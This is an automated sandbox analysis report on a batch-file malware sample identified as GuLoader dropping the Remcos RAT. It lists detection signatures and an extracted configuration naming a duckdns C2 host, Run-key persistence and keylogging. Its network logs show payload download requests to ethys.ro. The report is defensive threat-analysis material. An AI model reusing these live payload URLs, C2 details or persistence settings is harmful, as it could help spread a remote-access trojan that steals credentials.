Windows Analysis Report
ZW_PCCE-010023024001.bat

Overview

General Information

Sample name: ZW_PCCE-010023024001.bat
Analysis ID: 1540333
MD5: 38b51fe8789aee6c37ac4fa092eefa0f
SHA1: 8b5003d1917a07cd8f66cea66ad0add47130fc5b
SHA256: 36a9a24404963678edab15248ca95a4065bdc6a84e32fcb7a2387c3198641374
Tags: batuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["rj0987654321.duckdns.org:53848:1"], "Assigned name": "r", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Application path", "Copy file": "Windeep.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I42HQ2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppDir", "Keylog folder": "remcos"}
Source: Yara match File source: 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2715933734.0000000008A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 7800, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.2% probability
Source: unknown HTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.180.144.124:443 -> 192.168.2.9:49925 version: TLS 1.2
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*j[P source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.1669372747.0000000007535000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*tK source: msiexec.exe, 00000010.00000002.1958810388.0000000002F77000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\<.oeaccount source: msiexec.exe, 00000010.00000002.1958810388.0000000002F5A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1677454794.00000000086D0000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW, 15_2_0040AE51
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407EF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 17_2_00407898
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49976 -> 193.187.91.212:53848
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49978 -> 193.187.91.212:53848
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49974 -> 193.187.91.212:53848
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49979 -> 193.187.91.212:53848
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49980 -> 193.187.91.212:53848
Source: Malware configuration extractor URLs: rj0987654321.duckdns.org
Source: unknown DNS query: name: rj0987654321.duckdns.org
Source: global traffic TCP traffic: 192.168.2.9:49974 -> 193.187.91.212:53848
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.9:49977 -> 178.237.33.50:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49925 -> 81.180.144.124:443
Source: global traffic HTTP traffic detected: GET /Nonaddicting.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ethys.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /3/tVWTkim99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ethys.roCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /Nonaddicting.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ethys.roConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /3/tVWTkim99.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ethys.roCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe, 0000000F.00000003.1967295216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: _desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000F.00000003.1967295216.00000000009DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: _desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: bhv6BC6.tmp.15.dr String found in binary or memory: exp1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv6BC6.tmp.15.dr String found in binary or memory: exp2.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv6BC6.tmp.15.dr String found in binary or memory: exp3.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv6BC6.tmp.15.dr String found in binary or memory: exp4.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv6BC6.tmp.15.dr String found in binary or memory: exp5.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msiexec.exe, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: msiexec.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhv6BC6.tmp.15.dr String found in binary or memory: realtime.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv6BC6.tmp.15.dr String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhv6BC6.tmp.15.dr String found in binary or memory: www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: msiexec.exe, 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: ethys.ro
Source: global traffic DNS traffic detected: DNS query: rj0987654321.duckdns.org
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000005.00000002.1669372747.00000000075BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: powershell.exe, 00000003.00000002.1453412594.0000013F81D86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ethys.ro
Source: msiexec.exe, 00000008.00000003.1913856834.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/
Source: msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp1
Source: msiexec.exe, 00000008.00000003.1938405710.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2717142633.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723953123.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744406884.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2741127584.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2768723852.0000000008A47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2715771259.0000000008A49000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2754734091.0000000008A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp_G
Source: msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gphy
Source: msiexec.exe, 00000008.00000003.1913901918.0000000008A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpt
Source: msiexec.exe, 00000008.00000003.1913856834.0000000008A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/r
Source: powershell.exe, 00000003.00000002.1476663613.0000013F90071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://ocsp.digicert.com0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://ocsp.digicert.com0:
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://ocsp.msocsp.com0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1453412594.0000013F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1633462897.0000000004A21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1633462897.0000000004B77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv6BC6.tmp.15.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: msiexec.exe, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, msiexec.exe, 00000011.00000003.1943191450.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943241860.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943268493.000000000338D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 00000011.00000003.1943191450.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943241860.000000000338D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000011.00000003.1943268493.000000000338D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.coma
Source: msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: msiexec.exe, 00000011.00000002.1943455048.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: msiexec.exe, 0000000F.00000002.1967891153.0000000000554000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.netUJL
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000003.00000002.1453412594.0000013F80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1633462897.0000000004A21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1657579338.0000000005A86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
Source: bhv6BC6.tmp.15.dr String found in binary or memory: https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
Source: powershell.exe, 00000003.00000002.1453412594.0000013F81A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1453412594.0000013F8022C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ethys.ro
Source: msiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ethys.ro/
Source: msiexec.exe, 00000008.00000003.2715933734.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2763354092.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2753540863.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2743559628.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2723001197.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2735060631.0000000008A23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ethys.ro/3/tVWTkim99.bin
